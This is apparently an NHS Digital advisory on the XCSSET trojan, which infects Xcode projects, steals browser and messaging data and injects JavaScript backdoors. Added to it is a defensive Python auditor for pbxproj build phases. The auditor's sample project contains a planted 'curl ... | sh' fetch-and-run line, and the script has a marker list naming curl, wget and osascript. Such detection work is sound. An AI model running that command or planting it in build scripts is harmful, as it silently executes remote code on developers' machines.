XCSSET Trojan
Summary
First observed in early August 2020, XCSSET is an information stealing trojan that uses an unusual infection method to apparently target Xcode developers.
Threat details
Introduction
XCSSET is a newly observed trojan seemingly targeting Mac users and Xcode developers.
Delivery
At the time of publication, it is unclear how XCSSET initially gains access to target systems. However, it is known that once it gains access, XCSSET will alter any reachable Xcode development projects such that a new copy of it is executed whenever an affected project is built. This capability appears to extend to projects stored in online repositories such as GitHub.
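Because the advisory says only that affected Xcode projects execute a fresh copy of the trojan at build time, and not how the project file is altered, a developer's most practical check is to enumerate every run-script build phase in their project files and compare it with the ones they added themselves. The following script is an added example and is not code from NHS Digital or from any XCSSET analysis; it assumes that a build-time implant is carried as a PBXShellScriptBuildPhase in project.pbxproj (the standard Xcode mechanism for running a shell script during a build), and the marker strings it flags are the author's own assumptions about what an unexpected phase commonly contains, not indicators from the advisory. The embedded project file is constructed for the example.

```python
"""List and flag run-script build phases in Xcode project.pbxproj files.

Added example, not part of the NHS Digital advisory. Assumption: a
build-time implant is carried as a PBXShellScriptBuildPhase, so listing
those phases lets a developer spot one they did not add.
"""
import re
import sys
from pathlib import Path

# One pbxproj object: 24-hex-char id, optional /* comment */, then { ... };
# A shell-script phase has no nested braces, so a non-greedy match to the
# first "};" captures its whole body.
PHASE_RE = re.compile(
    r'([0-9A-F]{24})\s*(?:/\*\s*(.*?)\s*\*/)?\s*=\s*\{(.*?)\};', re.S
)
# key = value;  where value is either a C-style quoted string or bare text.
FIELD_RE = re.compile(r'(\w+)\s*=\s*("(?:[^"\\]|\\.)*"|[^;]+);')

# Heuristic markers worth a closer look (assumed, not from the advisory).
SUSPECT = ("curl ", "wget ", "http://", "https://", "/tmp/",
           "base64", "osascript", "eval ")


def _unquote(value: str) -> str:
    """Strip pbxproj quoting and resolve backslash escapes."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
        value = re.sub(r'\\(.)',
                       lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)),
                       value)
    return value


def find_script_phases(pbxproj_text: str) -> list[dict]:
    """Return every PBXShellScriptBuildPhase found in a project.pbxproj body."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj_text):
        obj_id, comment, body = m.groups()
        fields = {k: _unquote(v) for k, v in FIELD_RE.findall(body)}
        if fields.get("isa") != "PBXShellScriptBuildPhase":
            continue
        script = fields.get("shellScript", "")
        phases.append({
            "id": obj_id,
            "name": fields.get("name") or comment or "(unnamed)",
            "shellPath": fields.get("shellPath", "/bin/sh"),
            "script": script,
            "suspect": any(marker in script for marker in SUSPECT),
        })
    return phases


def audit(root: Path) -> list[dict]:
    """Walk a checkout and collect run-script phases from every project.pbxproj."""
    findings = []
    for pbx in root.rglob("project.pbxproj"):
        for phase in find_script_phases(pbx.read_text(errors="replace")):
            phase["project"] = str(pbx)
            findings.append(phase)
    return findings


# Constructed sample: one expected lint phase, one phase nobody added,
# and a non-script phase that must be ignored.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    archiveVersion = 1;
    objectVersion = 50;
    objects = {
        A1B2C3D4E5F60718293A4B5C /* Run SwiftLint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run SwiftLint";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        0F0E0D0C0B0A090807060504 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -s https://example.invalid/stage2.sh | sh\n";
        };
        1234567890ABCDEF12345678 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
        };
    };
    rootObject = 00000000000000000000000A /* Project object */;
}
'''

if __name__ == "__main__":
    # Usage: python audit_pbxproj.py [path-to-checkout]; no path runs the sample.
    results = audit(Path(sys.argv[1])) if len(sys.argv) > 1 else find_script_phases(SAMPLE_PBXPROJ)
    for p in results:
        flag = "SUSPECT" if p["suspect"] else "ok     "
        print(f"{flag} {p.get('project', '<sample>')} phase {p['name']!r} ({p['shellPath']})")
        print("        " + p["script"].strip().replace("\n", "\n        "))
```

The marker list is deliberately simple; the point is to surface every phase for a human to read, since a phase the developer does not recognise is the finding regardless of what it contains. Running the audit in CI against a clean clone also catches a phase that only exists in a shared repository, which matters given the advisory's note that altered projects can live in online repositories.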
Activities
Once installed on a system, XCSSET will attempt to extract user information from web browsers, messaging platforms, and note-taking applications. It will also use universal cross-site scripting (UXSS) attacks to inject JavaScript backdoors into websites the user visits in order to collect financial information and credentials. This information is then sent to a command and control server.
Additionally, XCSSET is able to create and encrypt files, suggesting it can also be used as a ransomware tool. This capability is likely to be used as a diversionary tactic once XCSSET's operators have determined it has gathered sufficient information.
Remediation advice
To prevent and detect an infection, NHS Digital advises that:
- Secure configurations are applied to all devices.
- Security updates are applied at the earliest opportunity.
- Tamper protection settings in security products are enabled where available.
- Obsolete platforms are segregated from the rest of the network.
- IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
- Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
- Administrative accounts are only used for necessary purposes.
- Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
- Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.
Please note that the NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.
Indicators of compromise
Last edited: 19 August 2020 2:45 pm